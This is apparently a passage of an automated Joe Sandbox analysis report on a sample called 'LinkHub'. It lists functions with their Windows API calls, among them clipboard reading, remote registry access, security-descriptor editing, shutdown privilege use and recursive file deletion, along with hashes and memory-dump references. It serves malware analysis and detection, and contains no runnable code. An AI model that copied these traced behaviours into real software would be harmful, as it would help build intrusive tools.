                                                                                        • Opcode Fuzzy Hash: 620a8c3446433265d587af4cdebec72737ae518a2b3eff78ceec253b9dba0358
                                                                                        • Instruction Fuzzy Hash: 27D05EB2522324BF9B2C8B65DD4ACA7769CE901655380116FB806D2940F5B0FD10CAA0
                                                                                        Function 0024071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(00000000,00000000,?,00240A84,?,?,00000000,?,00240A84,00000000,0000000C), ref: 00240737
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: 71acc7a6a55211f5ce23e18f08f68dce96af9aa7521bcc75271c34e4a1286167
                                                                                        • Instruction ID: 39c73b51b1c4b7cf88340db9b120e71bf46b17a334ca61f9b039b390dfe165ea
                                                                                        • Opcode Fuzzy Hash: 71acc7a6a55211f5ce23e18f08f68dce96af9aa7521bcc75271c34e4a1286167
                                                                                        • Instruction Fuzzy Hash: D1D06C3200010DBBDF028F84ED06EDA3BAAFB48714F014000BE1856020C732E821AB94

                                                                                        Non-executed Functions

                                                                                        Function 002614AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00261A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00261A60
                                                                                          • Part of subcall function 00261A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,002614E7,?,?,?), ref: 00261A6C
                                                                                          • Part of subcall function 00261A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002614E7,?,?,?), ref: 00261A7B
                                                                                          • Part of subcall function 00261A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002614E7,?,?,?), ref: 00261A82
                                                                                          • Part of subcall function 00261A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00261A99
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00261518
                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0026154C
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00261563
                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0026159D
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002615B9
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 002615D0
                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 002615D8
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 002615DF
                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00261600
                                                                                        • CopySid.ADVAPI32(00000000), ref: 00261607
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00261636
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00261658
                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0026166A
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00261691
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00261698
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002616A1
                                                                                        • HeapFree.KERNEL32(00000000), ref: 002616A8
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002616B1
                                                                                        • HeapFree.KERNEL32(00000000), ref: 002616B8
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 002616C4
                                                                                        • HeapFree.KERNEL32(00000000), ref: 002616CB
                                                                                          • Part of subcall function 00261ADF: GetProcessHeap.KERNEL32(00000008,002614FD,?,00000000,?,002614FD,?), ref: 00261AED
                                                                                          • Part of subcall function 00261ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,002614FD,?), ref: 00261AF4
                                                                                          • Part of subcall function 00261ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,002614FD,?), ref: 00261B03
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                        • String ID:
                                                                                        • API String ID: 4175595110-0
                                                                                        • Opcode ID: 4adb098b8b066286bbd13f10dac1d202e295b12f61af35cbbc974df64f32e0ee
                                                                                        • Instruction ID: 178e58cc8c77dcb20e14cd922166775d0ae5328e304eca354c6cc4d7d5d20338
                                                                                        • Opcode Fuzzy Hash: 4adb098b8b066286bbd13f10dac1d202e295b12f61af35cbbc974df64f32e0ee
                                                                                        • Instruction Fuzzy Hash: 28715DB691020AABDF10DFA5EC49FEEBBBCBF04340F184516E915E7190D731A965CBA0
                                                                                        Function 0027F55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OpenClipboard.USER32(0029DCD0), ref: 0027F586
                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0027F594
                                                                                        • GetClipboardData.USER32(0000000D), ref: 0027F5A0
                                                                                        • CloseClipboard.USER32 ref: 0027F5AC
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0027F5E4
                                                                                        • CloseClipboard.USER32 ref: 0027F5EE
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0027F619
                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0027F626
                                                                                        • GetClipboardData.USER32(00000001), ref: 0027F62E
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0027F63F
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0027F67F
                                                                                        • IsClipboardFormatAvailable.USER32(0000000F), ref: 0027F695
                                                                                        • GetClipboardData.USER32(0000000F), ref: 0027F6A1
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0027F6B2
                                                                                        • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0027F6D4
                                                                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0027F6F1
                                                                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0027F72F
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0027F750
                                                                                        • CountClipboardFormats.USER32 ref: 0027F771
                                                                                        • CloseClipboard.USER32 ref: 0027F7B6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                        • String ID:
                                                                                        • API String ID: 420908878-0
                                                                                        • Opcode ID: 962c976f911152095a5eb59c3a072c4d60431169a8e627de6351f3b623dc8880
                                                                                        • Instruction ID: 495e76374a9f0a5d87902e1e02a10641a138c63d6d45b6126319808fe995da67
                                                                                        • Opcode Fuzzy Hash: 962c976f911152095a5eb59c3a072c4d60431169a8e627de6351f3b623dc8880
                                                                                        • Instruction Fuzzy Hash: 2D61E5312183029FD300EF20ED88F2AB7A8AF44704F54846EF85A872A2DB71DD55DB62
                                                                                        Function 002773D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00277403
                                                                                        • FindClose.KERNEL32(00000000), ref: 00277457
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00277493
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002774BA
                                                                                          • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 002774F7
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00277524
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                        • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                        • API String ID: 3830820486-3289030164
                                                                                        • Opcode ID: acb4e140f9badccfdeecf9f4bf77885e4fe408997aec0895a295f2fb14c76ae2
                                                                                        • Instruction ID: 27ff82ffae336985fd1f8a4b6e28a3f196d9be07a5c01a540579a1da0a6367fb
                                                                                        • Opcode Fuzzy Hash: acb4e140f9badccfdeecf9f4bf77885e4fe408997aec0895a295f2fb14c76ae2
                                                                                        • Instruction Fuzzy Hash: 09D17E72518344AEC310EF64C885EABB7ECAF88704F44491DF589D7292EB74DA54CBA2
                                                                                        Function 0027A087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0027A0A8
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 0027A0E6
                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 0027A100
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0027A118
                                                                                        • FindClose.KERNEL32(00000000), ref: 0027A123
                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0027A13F
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0027A18F
                                                                                        • SetCurrentDirectoryW.KERNEL32(002C7B94), ref: 0027A1AD
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0027A1B7
                                                                                        • FindClose.KERNEL32(00000000), ref: 0027A1C4
                                                                                        • FindClose.KERNEL32(00000000), ref: 0027A1D4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1409584000-438819550
                                                                                        • Opcode ID: fa55020bf1e897535ed2882306b4841f03f7346febb4391fd3502bb099825759
                                                                                        • Instruction ID: 6ffaee153e3deea40c88b67594b2ab79e34a2856c56811f596a557483e720d88
                                                                                        • Opcode Fuzzy Hash: fa55020bf1e897535ed2882306b4841f03f7346febb4391fd3502bb099825759
                                                                                        • Instruction Fuzzy Hash: 8331D53261121A6BEB10AFB4EC4DADE73AC9F45330F508196F819D2090EB74DE649E65
                                                                                        Function 00274763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00274785
                                                                                        • _wcslen.LIBCMT ref: 002747B2
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 002747E2
                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00274803
                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 00274813
                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0027489A
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002748A5
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002748B0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                        • String ID: :$\$\??\%s
                                                                                        • API String ID: 1149970189-3457252023
                                                                                        • Opcode ID: 011b482e7b5cc96f1990855fe915dad39b18e7515f7c5eec6001168f42c5d1e5
                                                                                        • Instruction ID: 9e274b863fd8f982fb9874c04d1fe0dd17035844d5e4f720574b6aecaf7bbd59
                                                                                        • Opcode Fuzzy Hash: 011b482e7b5cc96f1990855fe915dad39b18e7515f7c5eec6001168f42c5d1e5
                                                                                        • Instruction Fuzzy Hash: 3B31E67191014AABDB20AFA0EC49FEB37BCEF89700F1081B6F609D2060E77096548F25
                                                                                        Function 0027A1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0027A203
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0027A25E
                                                                                        • FindClose.KERNEL32(00000000), ref: 0027A269
                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0027A285
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0027A2D5
                                                                                        • SetCurrentDirectoryW.KERNEL32(002C7B94), ref: 0027A2F3
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0027A2FD
                                                                                        • FindClose.KERNEL32(00000000), ref: 0027A30A
                                                                                        • FindClose.KERNEL32(00000000), ref: 0027A31A
                                                                                          • Part of subcall function 0026E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0026E3B4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                        • String ID: *.*
                                                                                        • API String ID: 2640511053-438819550
                                                                                        • Opcode ID: fced30e5e8512858d7bf10abb527987a789c72db4d66eae42058795a7eb983f4
                                                                                        • Instruction ID: b677ddb39eda0ace2438c6e29ac563f1493206bed85b95d6ca4a96c672244ca7
                                                                                        • Opcode Fuzzy Hash: fced30e5e8512858d7bf10abb527987a789c72db4d66eae42058795a7eb983f4
                                                                                        • Instruction Fuzzy Hash: 7731143151061A6EDF10AFB4EC09EDE77AC9F85334F108196F818A3091DB71DEA5DE25
                                                                                        Function 0028C8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0028D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0028C10E,?,?), ref: 0028D415
                                                                                          • Part of subcall function 0028D3F8: _wcslen.LIBCMT ref: 0028D451
                                                                                          • Part of subcall function 0028D3F8: _wcslen.LIBCMT ref: 0028D4C8
                                                                                          • Part of subcall function 0028D3F8: _wcslen.LIBCMT ref: 0028D4FE
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0028C99E
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0028CA09
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0028CA2D
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0028CA8C
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0028CB47
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0028CBB4
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0028CC49
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0028CC9A
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0028CD43
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0028CDE2
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0028CDEF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                        • String ID:
                                                                                        • API String ID: 3102970594-0
                                                                                        • Opcode ID: bf10e324d84a469c3da536522ac31b030ddb2732f802c809629272edbdde8000
                                                                                        • Instruction ID: 0638c96c9b22a4aa49cbf9bde294c9975334ef9f1760c00a551d47a435663e0d
                                                                                        • Opcode Fuzzy Hash: bf10e324d84a469c3da536522ac31b030ddb2732f802c809629272edbdde8000
                                                                                        • Instruction Fuzzy Hash: 8B027075615201AFD714EF28C895E2ABBE5EF49314F18849DF849CB2A2CB31EC52CF61
                                                                                        Function 0026D921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00205851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002055D1,?,?,00244B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00205871
                                                                                          • Part of subcall function 0026EAB0: GetFileAttributesW.KERNEL32(?,0026D840), ref: 0026EAB1
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0026D9CD
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0026DA88
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0026DA9B
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 0026DAB8
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0026DAE2
                                                                                          • Part of subcall function 0026DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0026DAC7,?,?), ref: 0026DB5D
                                                                                        • FindClose.KERNEL32(00000000,?,?,?), ref: 0026DAFE
                                                                                        • FindClose.KERNEL32(00000000), ref: 0026DB0F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                        • String ID: \*.*
                                                                                        • API String ID: 1946585618-1173974218
                                                                                        • Opcode ID: 39acc0ae4f8803b61b25ad3d71bce04da1d62456cd18f3112d1fccca6e971075
                                                                                        • Instruction ID: 6f0aeab928ae71a1c650232add9110733905ebf786aa79b88fe215b2bf73110e
                                                                                        • Opcode Fuzzy Hash: 39acc0ae4f8803b61b25ad3d71bce04da1d62456cd18f3112d1fccca6e971075
                                                                                        • Instruction Fuzzy Hash: 54616931D1520EAACF11EFE0DA869EDB7B5AF15304F2040A5E402B7196EB316F69DF60
                                                                                        Function 0027F7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1737998785-0
                                                                                        • Opcode ID: a06331e5b88e0e2a7196483ba6436ed7e6d35c816148ce95e63baf515e2f787a
                                                                                        • Instruction ID: 22d0e5311d1ee69a13cc53b7a4b4c92216be3af64f310f1ce19dac75e508a1c8
                                                                                        • Opcode Fuzzy Hash: a06331e5b88e0e2a7196483ba6436ed7e6d35c816148ce95e63baf515e2f787a
                                                                                        • Instruction Fuzzy Hash: 5341BD31A18612EFD750CF15E98CB15BBE4EF04318F15C4AAE8198B662CB35EC52CB91
                                                                                        Function 0026F20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00262010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0026205A
                                                                                          • Part of subcall function 00262010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00262087
                                                                                          • Part of subcall function 00262010: GetLastError.KERNEL32 ref: 00262097
                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 0026F249
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                        • String ID: $ $@$SeShutdownPrivilege
                                                                                        • API String ID: 2234035333-3163812486
                                                                                        • Opcode ID: 5591e83f5a67d4d8fcf956d09c0a60e4b4b974689d3d3c95c64f718d67e9e3ff
                                                                                        • Instruction ID: c0c4c3a17229d5d093ff0911fdd7d946602895c7aaa8b0fc5d18139466eec431
                                                                                        • Opcode Fuzzy Hash: 5591e83f5a67d4d8fcf956d09c0a60e4b4b974689d3d3c95c64f718d67e9e3ff
                                                                                        • Instruction Fuzzy Hash: 2B01497A6302116BEF5427B8BEAAFBF736C9B08344F150531FD12E20D2D5604CF49990
                                                                                        Function 002022AD Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 308COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DefDlgProcW.USER32(?,?), ref: 0020233E
                                                                                        • GetSysColor.USER32(0000000F), ref: 00202421
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00202434
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
